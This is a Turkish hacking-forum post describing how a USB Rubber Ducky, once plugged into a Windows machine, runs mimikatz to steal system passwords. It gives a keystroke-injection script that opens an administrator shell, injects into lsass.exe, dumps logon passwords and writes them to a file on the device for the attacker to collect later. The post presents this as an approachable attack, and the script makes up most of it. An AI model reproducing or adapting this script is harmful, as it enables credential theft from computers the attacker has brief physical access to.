2 Tools İle Sistem Şifrelerinin Çalınması Vs.

Gerekli araçları tanıdıktan sonra tekrar dizimize dönelim. Şifre ele geçirme işlemi nasıl gerçekleştirili?

Öncelikle almış olduğumu USB Rubber Ducky, sisteme takıldıktan sonra mimikatz programını yukarıda örneğini verdiğimiz komutları çalıştıracak şekilde programlandı.

Tahmini olarak kabaca şöyle olabilir (DELAY kısımlarını yazmadan);

GUI r
STRING runas /user:administrator "C:\Windows\System32\cmd.exe"
ENTER
STRING [Sisteme bağlı Ducky’nin bellek yolu]\mimikatz.exe
ENTER
STRING privilege::debug
ENTER
STRING inject::process lsass.exe sekurlsa.dll
ENTER
STRING @getLogonPasswords
ENTER
STRING log passwords.txt
ENTER
STRING exit
ENTER

Yukarıda yazdığım script tahmini bir script elbette, daha çok bir algoritma gibi düşünebilirsiniz. Bu scriptin içerisine Ducky’nin içinde yer alan bir başka scriptin çalışmasını sağlayacak kodlar eklenmiş olması gerekir (cmd ekranında dosya yolu belirtip bir .exe dosyası çalıştırılabilir).

Aldığımız bilgileri passwords.txt adlı dosyaya yazdırırız, kendi bilgisayarımızda Ducky içerisindeki microSD kartı takıp passwords.txt içerisindeki ele geçirilen bilgiler arasından yöneticilere ait bilgiler yer alabilir
Kullanıcı adı ve şifreleri bu şekilde alabiliriz

Oldukça basit ve temiz bir iş. Yoksa değil mi?


Mimikatz Nedir ? = https://www.spyhackerz.com/forum/threads/mimikatz-nedir.11234/#post-88817
USB Rubber Ducky Nedir ? = https://www.spyhackerz.com/forum/threads/usb-rubber-ducky-nedir-ne-işe-yarar.11233/#post-88816